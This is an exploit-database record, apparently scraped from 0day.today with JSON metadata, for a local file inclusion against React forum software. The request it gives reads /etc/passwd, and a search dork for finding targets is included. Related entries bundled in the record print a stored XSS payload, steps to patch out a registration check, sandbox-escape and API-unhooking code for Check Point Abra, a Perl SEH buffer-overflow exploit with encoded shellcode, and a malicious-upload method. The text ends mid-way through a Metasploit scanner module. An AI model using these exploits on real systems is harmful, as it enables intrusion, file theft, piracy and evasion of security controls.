ID 1337DAY-ID-11514
Type zdt
Reporter SNK
Modified 2010-03-30T00:00:00
Description
Exploit for php platform in category web applications
=================================================
React software local file inclusion Vulnerability
=================================================
React software [local file inclusion]
- date: 29.03.2010
- author: SNK
- language: php
- page: http://react.nl
- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00
- dork: Powered by React - www.react.nl
# 0day.today [2018-02-27] #
{"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T02:26:49", "bulletin": {"published": "2010-03-30T00:00:00", "id": "1337DAY-ID-11514", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 2.6, "modified": "2016-04-19T02:26:49"}}, "hash": "8fc12c1b1889dd337d78d58046e93158878a09a1fe1ebc93b9462a3edad8b119", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T02:26:49", "edition": 1, "title": "React software local file inclusion Vulnerability", "href": "http://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "04c78c4d1282ac0ac43e8bed558f7313", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0803d5d168c716e71a3f12fee71d0c7e", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "214f59e4092db334832c6fc343a26bd9", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "9d7846ef88f385c960c6fed81338543d86c91c9b4fd350518e57d2db987b91df", "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2018-02-28T01:35:08"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-32634", "1337DAY-ID-32638", "1337DAY-ID-18945", "1337DAY-ID-8156", "1337DAY-ID-2050"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SCADA/PROFINET_SIEMENS", "MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_TH_SAPREL_DISCLOSURE", "MSF:AUXILIARY/SCANNER/AFP/AFP_SERVER_INFO", "MSF:AUXILIARY/SCANNER/NATPMP/NATPMP_PORTSCAN", "MSF:AUXILIARY/SCANNER/ORACLE/SID_BRUTE", "MSF:AUXILIARY/SCANNER/SNMP/SNMP_ENUM", "MSF:AUXILIARY/SCANNER/SSH/SSH_VERSION", "MSF:AUXILIARY/SCANNER/PORTSCAN/FTPBOUNCE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11514", "SECURITYVULNS:VULN:5799", "SECURITYVULNS:DOC:11514"]}], "modified": "2018-02-28T01:35:08"}, "vulnersScore": -0.8}, "type": "zdt", "lastseen": "2018-02-28T01:35:08", "edition": 2, "title": "React software local file inclusion Vulnerability", "href": "https://0day.today/exploit/description/11514", "modified": "2010-03-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/11514", "references": [], "reporter": "SNK", "sourceData": "=================================================\r\nReact software local file inclusion Vulnerability\r\n=================================================\r\n\r\nReact software [local file inclusion]\r\n \r\n- date: 29.03.2010\r\n \r\n- author: SNK\r\n- language: php\r\n- page: http://react.nl\r\n- vuln: http://page/forum/list_message/index.php?action=../../../../../../../../../../../../../etc/passwd%00\r\n- dork: Powered by React - www.react.nl\r\n\r\n\n\n# 0day.today [2018-02-27] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "1071d166ab53f7bc9350db948fc8b392", "key": "href"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "modified"}, {"hash": "682a6ef41c7b593eb6f87d7a3be49607", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "888c810137fa148866cb9a08cbcb66c0", "key": "reporter"}, {"hash": "c75f7910abb7bd0230d461e3c354f628", "key": "sourceData"}, {"hash": "3772f0e5824247cd17aed7453963e45a", "key": "sourceHref"}, {"hash": "bbe65366bfd6d96ebacd1b3d59662a12", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-05-02T03:55:32", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32638", "href": "https://0day.today/exploit/description/32638", "title": "Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)\r\n# Exploit Author: Seyed Sadegh Khatami\r\n# Website: https://www.cert.ir\r\n# Vendor Homepage: https://www.veeam.com/\r\n# Software Link: https://www.veeam.com/virtual-server-management-one-free.html\r\n# Version: 9.5.0.3201\r\n# Tested on: Windows Server 2016\r\n\r\n\r\n#exploit:\r\n\r\nPath: /CommonDataHandlerReadOnly.ashx \r\n\r\nmethod: addDashboard / editDashboard\r\n\r\nSET Description(config) field to \u201cAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>\u201d\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32638"}, {"lastseen": "2018-01-09T17:14:50", "bulletinFamily": "exploit", "description": "MP3 Cutter is a Windows desktop utility allows you to cut and split a big MP3 or video to small audio pieces. \rWith MP3 Cutter, you can split and cut not only MP3 format, but also WMA, WAV, AMR, WMV, AVI, MPG, 3GP, MP4, FLAC, \rOGG, WMV, MOV and more than 40 audio & video formats. \r (Copy of the Vendor Homepage: http://www.mp3cutter.org/)\r", "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25959", "id": "1337DAY-ID-25959", "type": "zdt", "title": "MP3 Cutter 1.1.0 - Reverse Engineering ByPass Registration Vulnerability", "sourceData": "Technical Details & Description:\r\n================================\r\nA Reverse Enginering Vulnerability has been discovered in the official MP3 Cutter v1.1.0 software.\r\n\r\nAn attacker could make the software completely free MP3 Cutter manipulating conditoinel jumps and bypass security registration code to back any password and validated registration.\r\n\r\nVulnerable Input(s):\r\n\t\t\t[+] Registration Code\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nA Reverse Enginering Vulnerability can be exploited by local attackers with low privileged system user account.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\nManual steps to reproduce the vulnerability ...\r\n1. Debug MP3 Cutter.exe\r\n2. Find the string \"Invaild Serial Code\"\r\n3. Replace the conditional jump \"JMP\" in \"JNZ\"\r\n4. Save the changes made and save the executable\r\n5. Run the software you have changed\r\n6. Click \"Register MP3 Cutter now\"\r\n7. Enter any code in \"Input Registration Code\" eg 12345 and click \"OK\"\r\n8. BOOMM Registration Hijacked.\r\n\r\n--- PoC : Exploit ---\r\n0067C193 E9 5A010000 JMP MP3Cutte.0067C2F2 <-- Handle the conditional jump JMP to (JNZ MP3Cutte.0067C2F2)\r\n0067C198 C745 FC 13000000 MOV DWORD PTR SS:[EBP-4],13\r\n0067C19F C785 60FFFFFF 04>MOV DWORD PTR SS:[EBP-A0],80020004\r\n0067C1A9 C785 58FFFFFF 0A>MOV DWORD PTR SS:[EBP-A8],0A\r\n0067C1B3 C785 70FFFFFF 04>MOV DWORD PTR SS:[EBP-90],80020004\r\n0067C1BD C785 68FFFFFF 0A>MOV DWORD PTR SS:[EBP-98],0A\r\n0067C1C7 C785 40FFFFFF 38>MOV DWORD PTR SS:[EBP-C0],MP3Cutte.005BE>; UNICODE \"Invaild\"\r\n0067C1D1 C785 38FFFFFF 08>MOV DWORD PTR SS:[EBP-C8],8\r\n0067C1DB 8D95 38FFFFFF LEA EDX,DWORD PTR SS:[EBP-C8]\r\n0067C1E1 8D8D 78FFFFFF LEA ECX,DWORD PTR SS:[EBP-88]\r\n0067C1E7 E8 3271D8FF CALL <JMP.&MSVBVM60.__vbaVarDup>\r\n0067C1EC C785 50FFFFFF 08>MOV DWORD PTR SS:[EBP-B0],MP3Cutte.005BE>; UNICODE \"Invaild Serial Code.\"\r\n\r\n\r\n[+] Disclaimer [+]\r\n===================\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.\r\nThe author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.\r\n\r\n\r\nDomain: www.zwx.fr\r\nContact: [email\u00a0protected]\t\r\nSocial: twitter.com/XSSed.fr\r\nFeeds: www.zwx.fr/feed/\r\nAdvisory: www.vulnerability-lab.com/show.php?user=ZwX\r\n packetstormsecurity.com/files/author/12026/\r\n cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/\r\n 0day.today/author/27461\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25959", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-03T21:40:16", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "1337DAY-ID-18945", "href": "https://0day.today/exploit/description/18945", "type": "zdt", "title": "Checkpoint Abra Multiple Vulnerabilities", "sourceData": "#############################################################################\r\nCheck Point Abra Vulnerabilities\r\n \r\nVendor: Check Point Software Technologies Ltd\r\nProduct web page: http://rus.checkpoint.com/products/abra/index.html; http://www.checkpoint.com/products/go/\r\nPlatforms: Windows XP, Vista, 7 (32 bit)\r\n \r\nSummary: Check Point Abra allows you to create a secure virtual workspace on any PC, this solution may significantly affect the way of organizing the work of mobile employees. With Abra solutions you can easily turn any PC into a fully secure workplace, so you no longer need to carry bulky laptops or heavy folders. Convenient USB-drive form factor body allows you to quickly create a virtual workplace, while the virtualization technology and built-in encryption ensures the mobile data safety. Abra provides users with protection when working in offline mode by an encrypted USB-drive, and online - through VPN client software.\r\n \r\nDescription: Imperfect control modules and data monitoring application allows you to run any file, bypassing the current policy around virtualization, and read\\write data from an isolated Abra session directly into the PC operating system, conduct phishing attacks, etc.\r\n \r\n#############################################################################\r\n \r\nRun third-party software in a secure session:\r\n \r\nControl rules used applications are in the file\r\nX:\\PWC\\data\\sandbox-persistence.ref (\u0438 X:\\PWC\\data\\ swspogo.xml, F:\\PWC\\data\\ ISWPolicy.xml, X:\\PWC\\data\\ ics_policy.xml). Any application not from the white list will not be able to perform when working in a secure session.\r\n \r\nAs part of the session is allowed to run the pre-installed software: Internet Explorer, Notepad, Calculator, Office, Remote Desktop Connection (+ Portable Apps) to use system utilities, and host machines that are clearly indicated in the configuration file F:\\PWC\\data\\sandbox-persistence.ref.\r\n \r\nExample:\r\n \r\n<Execute OriginalName=\"calc.exe\" PathName=\"\\calc.exe\" AppName=\"Microsoft Calculator\" UIDescription=\"Microsoft Calculator\" id=\"134\"/>\r\nApplication Control session examines the application run only on paths, file names, as well as record VersionInfo in the file.\r\n \r\nThis implies you can import an arbitrary application and run it to bypass the control policy of applications. This is implemented by changing the file name and the field in the resource OriginalFilename VERSIONINFO on any of the white list. Moreover, the user may replace any executable file (eg archiver WinRar) to the host OS without any imports into the secure session and the file will automatically be filled in a secure session (run by the correspondences of extensions, or from the \"start\" menu).\r\n \r\nIt is also possible to substitute the system default software from the session \"Start\" menu (Internet Explorer, Notepad, Calculator, File Protection is off to the host OS, you need administrator rights). The substitution of system files can be implemented after disabling File Protection Windows File Protection with a call to the fifth ordinal of exported file system sfc_os.dll functions (windows xp), sample code:\r\n \r\n hInst := LoadLibrary('sfc_os.dll');\r\n proc := GetProcAddress(hInst, ordinal 5);\r\n filename := 'c:\\windows\\system32\\calc.exe';\r\n asm\r\n push -1\r\n push filename\r\n push 0\r\n call proc\r\n end\r\n \r\nEither by modifying the rights to the file (Vista and above):\r\ntakeown /f <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430>\r\nicacls <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430> /grant %username%:F\r\nicacls <\u0438\u043c\u044f_\u0444\u0430\u0439\u043b\u0430> /grant *S-1-1-0:(F)\r\n \r\nIt is also well executed Bat-files downloaded from the host computer\u2019s folder called \"Downloaded from PC\", or any other.\r\n \r\nThe structure of the boot process and secure session:\r\n \r\nDuring the secure session creates a separate process group. Executable files and libraries are the product of two assemblies 32 and 64-bit. But despite this, the 64-bit systems still run a few 32-bit modules in the X folder: \\ Go \\ PWC \\ WoW64.\r\n \r\nThe second copy process launches the ISWMGR.exe Explorer explorer.exe processes, which is the parent of all, offered in a secure session of external tools and imported programs.\r\n \r\nWhen starting the imported files in a secure session they run a separate application-boot X: \\ PWC \\ WOW64 \\ ISWLDR.dat. He, in turn, loads the library ISWUL.dll, causing the function to set InitHook interceptions. Installed hooks calling functions for working with files, the registry, the clipboard, cryptography, etc:\r\n \r\nHANDLE (__stdcall *__cdecl GetAddrOf_SetClipboardData())(UINT, HANDLE)\r\n{\r\n HANDLE (__stdcall *result)(UINT, HANDLE); // [email\u00a0protected]\r\n \r\n result = SetClipboardData;\r\n addr_SetClipboardData = SetClipboardData;\r\n return result;\r\n}\r\n \r\nint __cdecl hooks_Clipboard()\r\n{\r\n int v0; // [email\u00a0protected]\r\n int v1; // [email\u00a0protected]\r\n int v2; // [email\u00a0protected]\r\n int v3; // [email\u00a0protected]\r\n int result; // [email\u00a0protected]\r\n \r\n v0 = splice_func(addr_SetClipboardData, callback_SetClipboardData);\r\n if ( v0 )\r\n addr_SetClipboardData = v0;\r\n v1 = splice_func(addr_GetClipboardData, callback_GetClipboardData);\r\n if ( v1 )\r\n addr_GetClipboardData = v1;\r\n v2 = splice_func(addr_OpenClipboard, callback_OpenClipboard);\r\n if ( v2 )\r\n addr_OpenClipboard = v2;\r\n v3 = splice_func(addr_EmptyClipboard, callback_EmptyClipboard);\r\n if ( v3 )\r\n addr_EmptyClipboard = v3;\r\n result = splice_func(addr_CloseClipboard, callback_CloseClipboard);\r\n if ( result )\r\n addr_CloseClipboard = result;\r\n return result;\r\n}\r\n \r\nIt is possible to bypass interceptor functions by their release (recovery of the original code functions as it was before the modification) - direct reading from a file system folder (for the use of technology before the reading system files must be copied to a temporary folder and install a structured exception handler), such as ntdll.dll, read the first 10-15 bytes of the function from the file and overwrite the buffer was read the prologue of the corresponding function in the memory (which is the function of the jump-hook, for example ZwLoadDriver).\r\n \r\nTechnique, for example, can allow making changes to files \\ Registry of the secure session directly to the host system.\r\n \r\nprocedure resolve_APIs_from_dll_images(mapped_dll_base: pointer; dllname: string);\r\nvar\r\nvar_4, var_8, var_10, var_20, var_24, var_2C, var_28, var_3C, var_1C, dllbase, Src, old: DWORD;\r\nbegin\r\nasm\r\n pushad\r\n mov eax, [mapped_dll_base]\r\n mov ecx, [eax+3Ch]\r\n mov edx, [mapped_dll_base]\r\n lea eax, [edx+ecx+18h]\r\n mov [var_10], eax\r\n mov ecx, [var_10]\r\n mov edx, [mapped_dll_base]\r\n add edx, [ecx+60h]\r\n mov [var_4], edx\r\n mov eax, [var_4]\r\n mov ecx, [mapped_dll_base]\r\n add ecx, [eax+1Ch]\r\n mov [var_8], ecx\r\n mov ecx, [var_4]\r\n mov edx, [mapped_dll_base]\r\n add edx, [ecx+20h]\r\n mov [var_20], edx\r\n mov eax, [var_4]\r\n mov ecx, [mapped_dll_base]\r\n add ecx, [eax+24h]\r\n mov [var_2C], ec\r\n push dllname\r\n call LoadLibrary\r\n mov [var_28], eax\r\n cmp [var_28], 0\r\n jne @loc_41D111\r\n jmp @ending\r\n@loc_41D111:\r\n mov [var_24], 0\r\n jmp @loc_41D135\r\n@loc_41D11A:\r\n mov eax, [var_24]\r\n add eax, 1\r\n mov [var_24], eax\r\n mov ecx, [var_20]\r\n add ecx, 4\r\n mov [var_20], ecx\r\n mov edx, [var_2C]\r\n add edx, 2\r\n mov [var_2C], edx\r\n@loc_41D135:\r\n mov eax, [var_4]\r\n mov ecx, [var_24]\r\n cmp ecx, [eax+18h]\r\n jnb @ending\r\n mov ecx, [var_24]\r\n mov edx, [var_20]\r\n mov eax, [mapped_dll_base]\r\n add eax, [edx]\r\n mov ecx, [var_24]\r\n mov edx, [var_8]\r\n mov eax, [var_28]\r\n add eax, [edx+ecx*4]\r\n mov [var_3C], eax\r\n mov ecx, [var_24]\r\n mov edx, [var_8]\r\n mov eax, [mapped_dll_base]\r\n add eax, [edx+ecx*4]\r\n mov [Src], eax\r\n push 0Ah\r\n mov ecx, [Src]\r\n push ecx\r\n lea edx, [Dst]\r\n push edx\r\n call memcpy\r\n add esp, 0Ch\r\n lea eax, [old]\r\n push eax\r\n push PAGE_EXECUTE_READWRITE\r\n push 0Ah\r\n mov eax, [var_3C]\r\n push eax\r\n call VirtualProtect\r\n push 0Ah\r\n lea ecx, [Dst]\r\n push ecx\r\n mov eax, [var_3C]\r\n push eax\r\n call memcpy\r\n add esp, 0Ch\r\n jmp @loc_41D11A\r\n@ending:\r\n popad\r\nend;\r\nend;\r\n \r\nfunction UnHook(dllname: string): boolean;\r\nvar\r\n MapOffset: pointer;\r\n dll, filename: string;\r\n MapHandle, FileHandle: THandle;\r\nBegin\r\n dll := SystemDir + '\\' + dllname;\r\n filename := GetSpecialPath(CSIDL_APPDATA) + '\\' + dllname;\r\n result := CopyFile(PChar(dll), PChar(filename), false);\r\n if result then\r\n begin\r\n FileHandle := CreateFile(pChar(filename), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);\r\n If FileHandle <> INVALID_HANDLE_VALUE then\r\n Try\r\n MapHandle := CreateFileMapping(FileHandle, nil, $1000002, 0, 0, nil);\r\n If MapHandle <> 0 then\r\n Try\r\n MapOffset := MapViewOfFile(MapHandle, FILE_MAP_READ, 0, 0, 0);\r\n If MapOffset <> nil then\r\n Try\r\n resolve_APIs_from_dll_images(MapOffset, dllname);\r\n Finally\r\n UnmapViewOfFile(MapOffset);\r\n End;\r\n Finally\r\n CloseHandle(MapHandle);\r\n End;\r\n Finally\r\n CloseHandle(FileHandle);\r\n End;\r\n DeleteFile(filename);\r\n end;\r\nEnd;\r\n \r\nprocedure Write2File(filename, s: string);\r\nvar\r\nf: textfile;\r\nbegin\r\n assignfile(f, filename);\r\n rewrite(f);\r\n writeln(f, s);\r\n closefile(f);\r\nend;\r\n \r\nbegin\r\nUnHook('ntdll.dll');\r\n...\r\nWrite2File('c:\\users\\Administrator\\Desktop\\POC.txt', 'Now we writing to host OS');\r\nend;\r\n \r\n#############################################################################\r\n \r\nPossible implementation of a phishing attack by modifying the file etc \\ hosts host system, all changes in it are also automatically applied for the secure session.\r\n\r\n\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18945"}, {"lastseen": "2018-02-07T01:22:33", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-11-17T00:00:00", "published": "2009-11-17T00:00:00", "id": "1337DAY-ID-8156", "href": "https://0day.today/exploit/description/8156", "type": "zdt", "title": "Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)", "sourceData": "====================================================================\r\nIcarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n====================================================================\r\n\r\n\r\n\r\n# Title: Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: D3V!L FUCK3R\r\n# Published: 2009-11-17\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n#!/user/bin/perl\r\n#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)\r\n#tested on win SP2\r\n#Author: germaya_x & D3v!LFUCK3R \r\n#Download :http://www.randomsoftware.com/pub/icarus.exe\r\n#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)\r\n#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com members :)\r\n#############################################################\r\nmy $bof=\"A\" x 332 ;\r\nmy $NEXT_sEh=\"\\xEB\\x06\\x90\\x90\";\r\nmy $SEH=\"\\x3F\\xB2\\x2E\\x66\";#hnetcfg.DLL\r\nmy $nop=\"\\x90\" x 20;\r\nmy $sec=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x34\\x4e\\x43\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x30\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x48\\x4f\\x44\\x4a\\x41\\x4b\\x48\".\r\n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x58\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\".\r\n\"\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x55\\x46\\x32\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\".\r\n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x58\\x4e\\x30\\x4b\\x44\".\r\n\"\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x48\".\r\n\"\\x41\\x50\\x4b\\x4e\\x49\\x58\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\".\r\n\"\\x42\\x4c\\x46\\x36\\x4b\\x38\\x42\\x44\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\".\r\n\"\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x38\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x48\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x48\\x4a\\x56\\x4e\\x33\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\".\r\n\"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x36\\x4a\\x59\".\r\n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x56\".\r\n\"\\x4e\\x56\\x43\\x46\\x42\\x30\\x5a\";\r\n###################################################################\r\nopen(myfile,'>> exploit.pgn');\r\nprint myfile $bof.$NEXT_sEh.$SEH.$nop.$sec;\r\n###################################################################\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8156"}, {"lastseen": "2018-01-03T00:59:31", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-07-27T00:00:00", "published": "2007-07-27T00:00:00", "id": "1337DAY-ID-2050", "href": "https://0day.today/exploit/description/2050", "type": "zdt", "title": "Seditio CMS <= v121 (pfs.php) Remote File Upload Vulnerability", "sourceData": "==============================================================\r\nSeditio CMS <= v121 (pfs.php) Remote File Upload Vulnerability\r\n==============================================================\r\n\r\n\r\n\r\n# Seditio CMS Remote File Upload Vulnerability\r\n\r\n# ReSearcher : A.D.T\r\n\r\n# Script : Seditio and Ldu Cms\r\n\r\n# Version : All Versions\r\n\r\n# Script HomePage : http://neocrome.net/\r\n\r\n# Dork : \"powered by seditio\" or \"powered by ldu\"\r\n\r\n# Risk : Very High!\r\n\r\n# Usage : Firstly, you register the victim web site. After, go to \"pfs.php\" and upload your evil script!\r\n\r\n# [+] Your Evil Script : evilscriptname.php.gif or evilscriptname.php.jpg or evilscriptname.php.png\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2050"}], "metasploit": [{"lastseen": "2019-12-15T05:01:39", "bulletinFamily": "exploit", "description": "This module will use Layer2 packets, known as Profinet Discovery packets, to detect all Siemens (and sometimes other) devices on a network. It is perfectly SCADA-safe, as there will only be ONE single packet sent out. Devices will respond with their IP configuration and hostnames. Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-11T07:15:41", "id": "MSF:AUXILIARY/SCANNER/SCADA/PROFINET_SIEMENS", "href": "", "type": "metasploit", "title": "Siemens Profinet Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'packetfu'\n\nclass MetasploitModule < Msf::Auxiliary\n def initialize\n super(\n 'Name' => 'Siemens Profinet Scanner',\n 'Description' => %q{\n This module will use Layer2 packets, known as Profinet Discovery packets,\n to detect all Siemens (and sometimes other) devices on a network.\n It is perfectly SCADA-safe, as there will only be ONE single packet sent out.\n Devices will respond with their IP configuration and hostnames.\n Created by XiaK Industrial Security Research Center (www[dot]xiak[dot]be))\n },\n 'References' =>\n [\n [ 'URL', 'https://wiki.wireshark.org/PROFINET/DCP' ],\n [ 'URL', 'https://github.com/tijldeneut/ICSSecurityScripts' ]\n ],\n 'Author' => 'Tijl Deneut <tijl.deneut[at]howest.be>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('INTERFACE', [ true, 'Set an interface', 'eth0' ]),\n OptInt.new('ANSWERTIME', [ true, 'Seconds to wait for answers, set longer on slower networks', 2 ])\n ], self.class\n )\n end\n\n def hex_to_bin(s)\n s.scan(/../).map { |x| x.hex.chr }.join\n end\n\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n end\n\n def hexint_to_str(s)\n s.to_i(16).to_s\n end\n\n def hex_to_address(s)\n hexint_to_str(s[0..1]) + '.' + hexint_to_str(s[2..3]) + '.' + hexint_to_str(s[4..5]) + '.' + hexint_to_str(s[6..7])\n end\n\n def parse_devicerole(role)\n arr = { \"01\" => \"IO-Device\", \"02\" => \"IO-Controller\", \"04\" => \"IO-Multidevice\", \"08\" => \"PN-Supervisor\" }\n return arr[role] unless arr[role].nil?\n 'Unknown'\n end\n\n def parse_vendorid(id)\n return 'Siemens' if id == '002a'\n 'Unknown'\n end\n\n def parse_deviceid(id)\n arr = { \"0a01\" => \"Switch\", \"0202\" => \"PC Simulator\", \"0203\" => \"S7-300 CPU\", \\\n \"0101\" => \"S7-300\", \"010e\" => \"S7-1500\", \"010d\" => \"S7-1200\", \"0301\" => \"HMI\", \\\n \"0403\" => \"HMI\", \"010b\" => \"ET200S\" }\n return arr[id] unless arr[id].nil?\n 'Unknown'\n end\n\n def parse_block(block, block_length)\n block_id = block[0..2 * 2 - 1]\n case block_id\n when '0201'\n type_of_station = hex_to_bin(block[4 * 2..4 * 2 + block_length * 2 - 1])\n print_line(\"Type of station: #{type_of_station}\")\n when '0202'\n name_of_station = hex_to_bin(block[4 * 2..4 * 2 + block_length * 2 - 1])\n print_line(\"Name of station: 